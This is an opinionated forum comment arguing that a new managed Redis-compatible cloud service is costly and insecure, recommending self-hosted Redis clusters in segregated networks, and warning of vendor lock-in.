Its a "solution" in the same vein as azure cosmos db, yes you can write less code/config to get the benefits of a cached front end on a db, but my god you will pay hand over fist if you actually use it on any meaningful project.
Do a cost analysis and it will be a lot cheaper to cluster a bunch of mid level VM's into a redis service than it is to use any of the cloud providers managed redis offerings, with the added advantage that you can house it in its own segregated vnet to over come the insanely permissive default security settings (redis's security sucks, you know its bad when access did it better and you wish for the "maturity and sensibleness" of mysql </sarcasm>), unlike the managed offerings which expose standard ports and act as a beacon for miscreants scanning with shodan. All it would take is for a s3 style "forgot to secure it" snafu, half dozen lines of python and a few hundred kb's of data to be written to enumerated keys and your looking at being liable for unlimited data charges, would make 4g roaming data charges look cheap
Nevermind that all this new service offers is what is already possible using redis modules as the article states, the fact its redis "compatible" fills me with dread as it makes me think proprietary data structures will come, which means your going to be stuck with it, until they mothball it and then what?...
Given the number of off the shelf redis kubernetes cluster solutions available, and if your data project is truly needing of distributed transaction logging you would be better off in my opinion in investing in the skills to run a cluster, maintain (sorta)portability between cloud vendors and build out your own bespoke solution. It will be cheaper (both in service and data costs) and a less compromised jack of all trades solution.